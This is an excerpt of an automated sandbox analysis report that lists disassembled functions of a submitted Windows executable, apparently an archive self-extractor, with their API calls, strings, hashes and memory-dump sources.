ASKNEXTVOL, xrefs: 0035AD28

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 6ade1b311fe9a0e92f17046f1d336cfaad108d7537087067b658de4d19620e46
Instruction ID: 6e92304e8885467c76892ac1add59fb17079e8d6e3d26050d40abca6cafff8fd
Opcode Fuzzy Hash: 6ade1b311fe9a0e92f17046f1d336cfaad108d7537087067b658de4d19620e46
Instruction Fuzzy Hash: EA118432284610AFD653AF68DC55F667BFDAB4B743F010610F641DB4B0C761A909A722

Function 0035DDA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

DialogBoxParamW.USER32(GETPASSWORD1,00010466,0035B270,?,?), ref: 0035DE18

Strings

GETPASSWORD1, xrefs: 0035DE0D
r5, xrefs: 0035DDDC
xz9, xrefs: 0035DE28

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$r5$xz9
API String ID: 665744214-2199392626
Opcode ID: fb3b3471ee38c90915ae5cc6446b6f6003dd5e94444d0cf2611867b005965abb
Instruction ID: 7ba7f3e9145ea0b01545b7221705474533ce7e4fb34406e2d5f999e2ab15b23d
Opcode Fuzzy Hash: fb3b3471ee38c90915ae5cc6446b6f6003dd5e94444d0cf2611867b005965abb
Instruction Fuzzy Hash: 75110B72610244AADB23DE34AC02FEB37DCAB06351F154065FD49AB190C6B4AD88D764

Function 0034D8EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0034D954
_strncpy.LIBCMT ref: 0034D99A

Part of subcall function 00351DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00381030,00000200,0034D928,00000000,?,00000050,00381030), ref: 00351DC4

Strings

@%s, xrefs: 0034D93E
$%s, xrefs: 0034D949

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ByteCharMultiWide__fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 562999700-834177443
Opcode ID: c21782069d73947a1031c5776dd6a956f7cde8a1c9706a73ea40a1a2ebdd30aa
Instruction ID: 175987913f0ad39bff0410877d41c0cd9c19fb1da8fec7e374a5b1a164bb7ca4
Opcode Fuzzy Hash: c21782069d73947a1031c5776dd6a956f7cde8a1c9706a73ea40a1a2ebdd30aa
Instruction Fuzzy Hash: 94217272540248AEDB22EEA4CD06FEE7BE8AF05704F044512FD54DE2A2E772E648DB51

Function 00350E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0034AC5A,00000008,?,00000000,?,0034D22D,?,00000000), ref: 00350E85
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0034AC5A,00000008,?,00000000,?,0034D22D,?,00000000), ref: 00350E8F
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0034AC5A,00000008,?,00000000,?,0034D22D,?,00000000), ref: 00350E9F

Strings

Thread pool initialization failed., xrefs: 00350EB7

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 08a593697f95bf0c49b8ca590de4a54dddbca377e672d0a41f32f6f75aa388a3
Instruction ID: 53ba5e697c3d98b1aae4b2864adbb8e9d686eecd4c58593283981969e5e7d719
Opcode Fuzzy Hash: 08a593697f95bf0c49b8ca590de4a54dddbca377e672d0a41f32f6f75aa388a3
Instruction Fuzzy Hash: D211C1B1600B089FC3325F669C869ABFBECEB55745F20482EF4DAC6200D672A9808B50

Function 0034124F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 0034125D

Strings

A, xrefs: 00341285
(5, xrefs: 003412A3
25, xrefs: 00341292

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: Malloc
String ID: (5$25$A
API String ID: 2696272793-85688843
Opcode ID: 756c45b34f76f9f2055dfd75834fdf8771294b946aed6251c7c5c22653dd65a3
Instruction ID: 275f43f24846639b381752c9730f4ce5c426517da12066cd52f61f5f8bfa0abd
Opcode Fuzzy Hash: 756c45b34f76f9f2055dfd75834fdf8771294b946aed6251c7c5c22653dd65a3
Instruction Fuzzy Hash: CE011B71901229ABCB15CFA4D844ADEBBFCEF09300F10455AE906E7200E775AA40CF94

Function 0035DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 0035DD1C, 0035DD50
RENAMEDLG, xrefs: 0035DD31

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 1422f7b70d5cc58d2283006ba5f3c8dc76b9f77f77bb0dd27ef7917fcc4d4afd
Instruction ID: 96a9b19da5d10e424450ef421fb86a15a551abff9b4627f357cf36647e9d6949
Opcode Fuzzy Hash: 1422f7b70d5cc58d2283006ba5f3c8dc76b9f77f77bb0dd27ef7917fcc4d4afd
Instruction Fuzzy Hash: D7018C76A04345AFDB239F65FC04DAA7BACEB09345F010426FC0683230CB319858DBA0

Function 00341316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0034E2E8: _swprintf.LIBCMT ref: 0034E30E
Part of subcall function 0034E2E8: _strlen.LIBCMT ref: 0034E32F
Part of subcall function 0034E2E8: SetDlgItemTextW.USER32(?,0037E274,?), ref: 0034E38F
Part of subcall function 0034E2E8: GetWindowRect.USER32(?,?), ref: 0034E3C9
Part of subcall function 0034E2E8: GetClientRect.USER32(?,?), ref: 0034E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0034135A
SetWindowTextW.USER32(00000000,003735F4), ref: 00341370

Strings

0, xrefs: 00341319
5, xrefs: 0034134A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 5$0
API String ID: 2622349952-1443944084
Opcode ID: 287d481a1319a72e0e9eb4ef7c6fb8184a71b2c51faf238e5dee98b70a5de45b
Instruction ID: 715d286a732124f10c4ffdb3803e138754639ce082cd9453056ea243eab28c6e
Opcode Fuzzy Hash: 287d481a1319a72e0e9eb4ef7c6fb8184a71b2c51faf238e5dee98b70a5de45b
Instruction Fuzzy Hash: 96F0AF38144788AADF172F608C0DBEA3BDCAF45344F058614FC44589A1CBB8D9D0EB10

Function 00369A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00369AA9
__alldvrm.LIBCMT ref: 00369CAA
__alldvrm.LIBCMT ref: 00369CCC

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction ID: 057d511e66d4468bab74d940dff12d78f3fac4858f575c9136a31121ce0cdc01
Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
Instruction Fuzzy Hash: 90A147729003869FEB27CF68C8917AEBBE9EF55310F1981AFE4859F285C2388941C750

Function 0034A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00347F69,?,?,?), ref: 0034A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00347F69,?), ref: 0034A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00347F69,?,?,?,?,?,?,?), ref: 0034A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00347F69,?,?,?,?,?,?,?,?,?,?), ref: 0034A4C6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: d2cefb5a34348a4880329c14ed264d8739945f3894b61d9d13fe193bf5c82a9f
Instruction ID: 2bad3e89ead3bdc59bf9201d641f9e5486bd7accbcad74221f469623f59f930c
Opcode Fuzzy Hash: d2cefb5a34348a4880329c14ed264d8739945f3894b61d9d13fe193bf5c82a9f
Instruction Fuzzy Hash: 1741C031288781AAE732DF24DC45FAFBBE89B84300F04091DB5D59B2D1D6A4AA48DB53

Function 0036C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,003691E0,?,00000000,?,00000001,?,?,00000001,003691E0,?), ref: 0036C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0036CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00366CBE,?), ref: 0036CA70
__freea.LIBCMT ref: 0036CA79

Part of subcall function 00368E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0036CA2C,00000000,?,00366CBE,?,00000008,?,003691E0,?,?,?), ref: 00368E38

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f893582e38d29d2ab144b234990c3fd086e99e1e7164796b183651a1490fc4b4
Instruction ID: 56a844553aec86e3a9d8364993103cf780340dc182ed95fe7b14ce57e5d8f045
Opcode Fuzzy Hash: f893582e38d29d2ab144b234990c3fd086e99e1e7164796b183651a1490fc4b4
Instruction Fuzzy Hash: D131C372A1020AABDF26DFA4CC45DBE7BA5EB01310F158169FC44EB254EB35CD90DBA0

Function 0035A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0035A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0035A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0035A683
ReleaseDC.USER32(00000000,00000000), ref: 0035A691

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: b8f68b05fc52f2f9741202262f88153693adf320d44005355c4c76f4246e5025
Instruction ID: 08fa99e1986d87bb2fa15c93d3cf4c95c143da10480d4f0f9f43006261efcc92
Opcode Fuzzy Hash: b8f68b05fc52f2f9741202262f88153693adf320d44005355c4c76f4246e5025
Instruction Fuzzy Hash: 89E01D31942721B7D3539B617C0DF8B3E5CAB16B53F414141FA06961D0DB7445048B91

Function 0035D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0035D11B

Strings

d5, xrefs: 0035D3C5
.lnk, xrefs: 0035D2F7, 0035D307

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcschr
String ID: .lnk$d5
API String ID: 2691759472-4090554635
Opcode ID: fa95a3041b82d38aabc67334c8950f6992e909ce8e81501c1b95e03f22f34ac8
Instruction ID: 2fa4a3e79651f3edf18ee4be219f5e83ec58d0a6720c3eaf8f5a647b1dd26855
Opcode Fuzzy Hash: fa95a3041b82d38aabc67334c8950f6992e909ce8e81501c1b95e03f22f34ac8
Instruction Fuzzy Hash: 77A1737290012996DF36DBA0CD45EFA73FC9F04305F0985A2B909EB151EF759B888B61

Function 003475DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003475E3

Part of subcall function 003505DA: _wcslen.LIBCMT ref: 003505E0

Part of subcall function 0034A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0034A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0034777F

Part of subcall function 0034A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0034A325,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A501
Part of subcall function 0034A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0034A325,?,?,?,0034A175,?,00000001,00000000,?,?), ref: 0034A532

Strings

:, xrefs: 00347654

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: a60cc96d7c74d213efb244ba50f0d89f1f8ec10512b0f9af97ac15e9df7e7763
Instruction ID: 92462640a32448d6ad38090641a693864299279524cca95d5ad077a06930c40d
Opcode Fuzzy Hash: a60cc96d7c74d213efb244ba50f0d89f1f8ec10512b0f9af97ac15e9df7e7763
Instruction Fuzzy Hash: 5A416E71800158A9EB26EB64CD55EEFB7BDEF41300F4140D6B609AE092DB746F89CB61

Function 0034B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0034B438
_wcschr.LIBVCRUNTIME ref: 0034B478

Strings

*, xrefs: 0034B38A

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcschr
String ID: *
API String ID: 2691759472-163128923
Opcode ID: a149862638609e09a68413ace8f1612b3d536facca9ee7afc9c2a2b19ff75c03
Instruction ID: 78348365e57ccd3037f5c0bee4af119f9370240f1a3dafd95cec53c450f0270c
Opcode Fuzzy Hash: a149862638609e09a68413ace8f1612b3d536facca9ee7afc9c2a2b19ff75c03
Instruction Fuzzy Hash: E43109361483019ACA329E57890267BF3E8DF95B60F17841EFA845F343E766FD419361

Function 0035B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0035B4E3
_wcslen.LIBCMT ref: 0035B4FE

Strings

}, xrefs: 0035B4D6

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: b97398daae27dbd1ca636f606ce3ce96cdd589f955d4f236d59ed0f82daad18a
Instruction ID: e4307ac5114f39ba392655382ba16257470c383a7e744266c1d69e778121ab8e
Opcode Fuzzy Hash: b97398daae27dbd1ca636f606ce3ce96cdd589f955d4f236d59ed0f82daad18a
Instruction Fuzzy Hash: 0121D1729043065AD737AA64D845E6BF3DCDF82752F02082AF980C7151FB65DD4C83B2

Function 0034F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0034F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0034F2E4
Part of subcall function 0034F2C5: GetProcAddress.KERNEL32(003881C8,CryptUnprotectMemory), ref: 0034F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0034F33E), ref: 0034F3D2

Strings

CryptUnprotectMemory failed, xrefs: 0034F3CA
CryptProtectMemory failed, xrefs: 0034F389

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.00000000003A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1654119576.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_0V2JsCrGUB.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 747de548175fc94b6e86193196746ef15f31da8f46ae775703caefc55f44e27d
Instruction ID: 8a90cd96a34b9d5e4aa2ef356fbb5728cb184d26c2472a84738f26c055f4a4a4
Opcode Fuzzy Hash: 747de548175fc94b6e86193196746ef15f31da8f46ae775703caefc55f44e27d
Instruction Fuzzy Hash: F0110335A00229AFDF23AF20DC46A6E3798EF00B20F09816AFC455F251DE74BD418791

Function 0035101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00351160,?,00000000,00000000), ref: 00351043
SetThreadPriority.KERNEL32(?,00000000), ref: 0035108A

Part of subcall function 00346C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00346C54

Part of subcall function 00346DCB: _wcschr.LIBVCRUNTIME ref: 00346E0A
Part of subcall function 00346DCB: _wcschr.LIBVCRUNTIME ref: 00346E19

Strings

CreateThread failed, xrefs: 0035104F

Memory Dump Source

Source File: 00000000.00000002.1653871028.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1653850160.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653947444.0000000000373000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1653974116.0000000000385000.00000004.00000001.01000000.00000003.sdmpDownload File
